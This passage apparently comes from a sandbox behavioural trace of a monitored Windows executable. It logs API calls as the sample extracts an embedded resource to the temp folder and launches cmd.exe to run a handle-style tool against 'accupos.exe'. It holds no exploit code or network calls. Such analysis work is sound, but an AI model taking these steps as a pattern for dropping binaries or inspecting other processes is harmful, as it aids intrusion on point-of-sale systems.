(HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x5183c0 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x52) returned 0x518410 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3c) returned 0x514e50 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x518470 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x82) returned 0x518490 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2e) returned 0x518520 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1e) returned 0x516ab0 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2c) returned 0x518558 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x54) returned 0x518590 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x52) returned 0x5185f0 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2a) returned 0x518650 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3c) returned 0x514e98 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x54) returned 0x518688 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x24) returned 0x5186e8 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x518718 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x8c) returned 0x518750 [0245.283] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x518808 | out: hHeap=0x500000) returned 1 [0245.284] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x800) returned 0x5187e8 [0245.284] GetLastError () returned 0x0 [0245.284] SetLastError (dwErrCode=0x0) [0245.284] GetLastError () returned 0x0 [0245.284] SetLastError (dwErrCode=0x0) [0245.284] GetLastError () returned 0x0 [0245.284] SetLastError (dwErrCode=0x0) [0245.285] GetACP () returned 0x4e4 [0245.285] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x220) returned 0x518ff0 [0245.285] GetLastError () returned 0x0 [0245.285] SetLastError (dwErrCode=0x0) [0245.285] IsValidCodePage (CodePage=0x4e4) returned 1 [0245.285] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0245.285] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0245.285] GetLastError () returned 0x0 [0245.285] SetLastError (dwErrCode=0x0) [0245.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0245.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0245.285] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0245.285] GetLastError () returned 0x0 [0245.285] SetLastError (dwErrCode=0x0) [0245.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0245.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0245.285] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0245.285] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0245.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÈX\x15Åäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0245.285] GetLastError () returned 0x0 [0245.286] SetLastError (dwErrCode=0x0) [0245.286] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0245.286] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0245.286] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0245.286] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0245.286] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÈX\x15Åäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0245.286] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x80) returned 0x519218 [0245.286] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0245.286] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0245.286] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x519218) returned 0x80 [0245.287] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0245.287] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0245.287] GetCurrentProcess () returned 0xffffffff [0245.287] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0245.287] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0245.287] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0245.287] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0245.287] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0245.287] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0245.287] LockResource (hResData=0x43c648) returned 0x43c648 [0245.287] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18) returned 0x5196e8 [0245.288] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.288] GetLastError () returned 0x20 [0245.288] GetLastError () returned 0x20 [0245.288] SetLastError (dwErrCode=0x20) [0245.288] GetLastError () returned 0x20 [0245.288] SetLastError (dwErrCode=0x20) [0245.288] GetLastError () returned 0x20 [0245.288] SetLastError (dwErrCode=0x20) [0245.288] GetLastError () returned 0x20 [0245.289] SetLastError (dwErrCode=0x20) [0245.289] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x519708 [0245.289] GetLastError () returned 0x20 [0245.289] SetLastError (dwErrCode=0x20) [0245.289] GetLastError () returned 0x20 [0245.289] SetLastError (dwErrCode=0x20) [0245.289] GetLastError () returned 0x20 [0245.289] SetLastError (dwErrCode=0x20) [0245.289] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0245.484] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0245.486] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5187e8 | out: hHeap=0x500000) returned 1 [0245.486] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0245.487] ExitProcess (uExitCode=0x1) [0245.487] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x517090 | out: hHeap=0x500000) returned 1 Process: id = "272" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x15aef000" os_pid = "0xa30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "246" os_parent_pid = "0xad0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"accupos.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 890 os_tid = 0xb1c [0245.312] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39f8cc | out: lpSystemTimeAsFileTime=0x39f8cc*(dwLowDateTime=0x47fe7a80, dwHighDateTime=0x1d68287)) [0245.312] GetCurrentProcessId () returned 0xa30 [0245.312] GetCurrentThreadId () returned 0xb1c [0245.312] GetTickCount () returned 0x116819f [0245.312] QueryPerformanceCounter (in: lpPerformanceCount=0x39f8c4 | out: lpPerformanceCount=0x39f8c4*=36565368560) returned 1 [0245.316] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0245.316] __set_app_type (_Type=0x1) [0245.316] __p__fmode () returned 0x770331f4 [0245.316] __p__commode () returned 0x770331fc [0245.316] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0245.316] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0245.316] GetCurrentThreadId () returned 0xb1c [0245.316] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb1c) returned 0x60 [0245.317] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0245.317] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0245.317] SetThreadUILanguage (LangId=0x0) returned 0x409 [0245.317] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0245.317] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x39f85c | out: phkResult=0x39f85c*=0x0) returned 0x2 [0245.317] VirtualQuery (in: lpAddress=0x39f893, lpBuffer=0x39f82c, dwLength=0x1c | out: lpBuffer=0x39f82c*(BaseAddress=0x39f000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0245.317] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x39f82c, dwLength=0x1c | out: lpBuffer=0x39f82c*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0245.317] VirtualQuery (in: lpAddress=0x2a1000, lpBuffer=0x39f82c, dwLength=0x1c | out: lpBuffer=0x39f82c*(BaseAddress=0x2a1000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0245.317] VirtualQuery (in: lpAddress=0x2a3000, lpBuffer=0x39f82c, dwLength=0x1c | out: lpBuffer=0x39f82c*(BaseAddress=0x2a3000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0245.317] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x39f82c, dwLength=0x1c | out: lpBuffer=0x39f82c*(BaseAddress=0x3a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0245.317] GetConsoleOutputCP () returned 0x1b5 [0245.317] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0245.318] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0245.318] _get_osfhandle (_FileHandle=1) returned 0x80 [0245.318] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0245.318] _get_osfhandle (_FileHandle=1) returned 0x80 [0245.318] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0245.318] _get_osfhandle (_FileHandle=0) returned 0x3 [0245.318] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0245.318] GetEnvironmentStringsW () returned 0x3d21d0* [0245.318] GetProcessHeap () returned 0x3c0000 [0245.319] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb7e) returned 0x3d2d58 [0245.319] FreeEnvironmentStringsW (penv=0x3d21d0) returned 1 [0245.319] GetProcessHeap () returned 0x3c0000 [0245.319] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4) returned 0x3d18b0 [0245.319] GetEnvironmentStringsW () returned 0x3d21d0* [0245.319] GetProcessHeap () returned 0x3c0000 [0245.319] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb7e) returned 0x3d38e0 [0245.319] FreeEnvironmentStringsW (penv=0x3d21d0) returned 1 [0245.319] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e7cc | out: phkResult=0x39e7cc*=0x68) returned 0x0 [0245.320] RegQueryValueExW (in: hKey=0x68, 